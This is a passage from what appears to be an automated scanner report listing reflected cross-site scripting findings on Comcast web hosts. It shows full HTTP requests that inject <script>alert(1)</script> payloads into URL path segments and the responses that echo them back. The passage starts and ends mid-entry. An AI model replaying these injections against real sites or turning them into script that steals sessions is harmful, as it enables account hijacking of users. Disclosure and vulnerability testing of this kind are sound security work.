The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 77b14<script>alert(1)</script>9cd91501f2a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation77b14<script>alert(1)</script>9cd91501f2a/pageflows/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:24 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLGpRLHMMNQnH4fkKVJRZPpr4818zS3V3RwkRkQ1X1rCyfHxGh0!198205627!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation77b14<script>alert(1)</script>9cd91501f2a/pageflows/Help/getFAQ</td>
...[SNIP]...

2.25. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 7b6f5<script>alert(1)</script>4d76aec21db was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows7b6f5<script>alert(1)</script>4d76aec21db/Help/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:25 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLFJlJV2hcp0DJXC712TSBplDsQLn2NL246M6XtmYTgJTxj0T1C!377427874!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows7b6f5<script>alert(1)</script>4d76aec21db/Help/getFAQ</td>
...[SNIP]...

2.26. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help/getFAQ.do

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 62a76<script>alert(1)</script>a79a11159c2 was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Help62a76<script>alert(1)</script>a79a11159c2/getFAQ.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:26 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLG0hxvHk7cTJp1GQTnh4lbJxLx1yM1vxnGwfJsXnLG7TPBDQWY!715189861!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows/Help62a76<script>alert(1)</script>a79a11159c2/getFAQ</td>
...[SNIP]...

2.27. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload deaea<script>alert(1)</script>082bf320537 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/comdeaea<script>alert(1)</script>082bf320537/comcast/online/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:20 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLQqxQ6GV11Wbvp5zS1tmnwpCMblny22XTm5hTLj62pTzBBLTzp!1325758820!-794401224; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>comdeaea<script>alert(1)</script>082bf320537/comcast/online/dvp/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.28. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c3c14<script>alert(1)</script>a205b4c0e20 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcastc3c14<script>alert(1)</script>a205b4c0e20/online/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:20 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLQVZrBhsxLHvRGZ7hjLppY1FSHbwjwnghLQvQr7Hkmvlv2psph!-1185923515!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcastc3c14<script>alert(1)</script>a205b4c0e20/online/dvp/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.29. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7d6c8<script>alert(1)</script>59ccf0b3972 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online7d6c8<script>alert(1)</script>59ccf0b3972/dvp/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:21 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLBZywMQ5KZD1CY2LT4c83KM57j22ZpLv086n72VFqgPX1MfzVl!-1576092857!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online7d6c8<script>alert(1)</script>59ccf0b3972/dvp/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.30. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 22a41<script>alert(1)</script>3524ac4ba0f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp22a41<script>alert(1)</script>3524ac4ba0f/presentation/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLChgQ8y1G1dPYKTygvH2hCR8L8TCS2Z19K9hGN65LJT4QPlKFs!377427874!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp22a41<script>alert(1)</script>3524ac4ba0f/presentation/pageflows/Login/authForward</td>
...[SNIP]...

2.31. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 593da<script>alert(1)</script>3df36c0971c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation593da<script>alert(1)</script>3df36c0971c/pageflows/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:22 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLCBFvV0TtBGyktZLC8Cpcqv6pQF5YvJ4bLYvyLBrvVY9WPpp1R!96692442!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation593da<script>alert(1)</script>3df36c0971c/pageflows/Login/authForward</td>
...[SNIP]...

2.32. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload ccf40<script>alert(1)</script>5f3c611fd1b was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflowsccf40<script>alert(1)</script>5f3c611fd1b/Login/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:23 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLDCKh5dhsLnJpQzVGdbxBhypmqxPlvN8nXxLphc40hhK63M1d1!-762166285!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflowsccf40<script>alert(1)</script>5f3c611fd1b/Login/authForward</td>
...[SNIP]...

2.33. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/authForward.do

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9ebcc<script>alert(1)</script>7145250d0fb was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login9ebcc<script>alert(1)</script>7145250d0fb/authForward.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:13:24 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTLGJ0t925k4LGfzSv9KJgLZvp8GSmvK2Qm17zLpwB3gMqb8SNT2!1440925265!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows/Login9ebcc<script>alert(1)</script>7145250d0fb/authForward</td>
...[SNIP]...

2.34. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b5e48<script>alert(1)</script>3f458fc69de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/comb5e48<script>alert(1)</script>3f458fc69de/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:48 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ0n7bqgh3SCLdr8Bl4nTXbxcrJJS3WwGhnRXMpBgtG0hqnGpTG!1720433980!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>comb5e48<script>alert(1)</script>3f458fc69de/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.35. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cace<script>alert(1)</script>b153324f0b2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast6cace<script>alert(1)</script>b153324f0b2/online/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:48 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ0p52J2YLphJQzvjn6FTv1cp2bRWLnzMwwRS13gQwSVJQJBLv5!255318197!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast6cace<script>alert(1)</script>b153324f0b2/online/dvp/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.36. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c0534<script>alert(1)</script>172078c0b3d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/onlinec0534<script>alert(1)</script>172078c0b3d/dvp/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:49 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ1CdjbT1DwVJxRtccGHqvK10Lst22t7mG6J4pqHP91jQ1xpMVn!715189861!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/onlinec0534<script>alert(1)</script>172078c0b3d/dvp/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.37. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 92a58<script>alert(1)</script>bc3efa62431 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp92a58<script>alert(1)</script>bc3efa62431/presentation/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ2XPTsT4v53gHrGvVkMdxdJxJvWFDBJDbpvMdTMvDFQ2kpwpyW!739888278!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp92a58<script>alert(1)</script>bc3efa62431/presentation/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.38. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6575b<script>alert(1)</script>7a29b212314 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation6575b<script>alert(1)</script>7a29b212314/pageflows/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:50 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ2KBT12YyTvcKwnw25vN2nJLrsGFPfhDWwhDnxL2crXn7cSmR7!96692442!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation6575b<script>alert(1)</script>7a29b212314/pageflows/Login/retrieveProfile</td>
...[SNIP]...

2.39. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 9ef06<script>alert(1)</script>9e07f1fca61 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows9ef06<script>alert(1)</script>9e07f1fca61/Login/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:51 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ3N1q4GLJdLQygnB9hvpMH2PtXsK6TvZjqKg4MJvDQWfzgvzTZ!-794401224!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows9ef06<script>alert(1)</script>9e07f1fca61/Login/retrieveProfile</td>
...[SNIP]...

2.40. https://digitalvoice.comcast.net/Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   https://digitalvoice.comcast.net
Path:   /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Login/retrieveProfile.do

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b6da7<script>alert(1)</script>89a6fcaa71e was submitted in the REST URL parameter 9. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Comcast/DVPPortal/com/comcast/online/dvp/presentation/pageflows/Loginb6da7<script>alert(1)</script>89a6fcaa71e/retrieveProfile.do HTTP/1.1
Host: digitalvoice.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:07:51 GMT
Server: Sun-ONE-Web-Server/6.1
Content-type: text/html;charset=utf-8
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NTJ4bZFGbpQFyZhzMWdTJNg5Hqlj6nplKLpGWGBG52GV6mRKl4n3!1431461321!NONE; path=/
Cache-Control: no-cache
Connection: close
Content-Length: 724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head><title>Page Flow Error - Action Not Found</title></head><body><h1>
...[SNIP]...
<td>com/comcast/online/dvp/presentation/pageflows/Loginb6da7<script>alert(1)</script>89a6fcaa71e/retrieveProfile</td>
...[SNIP]...

2.41. http://games.comcast.net/product_webgame.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://games.comcast.net
Path:   /product_webgame.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload cf871</noscript><script>alert(1)</script>4d1710b7efc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within NOSCRIPT tags does not prevent XSS attacks if the user is able to close the NOSCRIPT tag.

Request

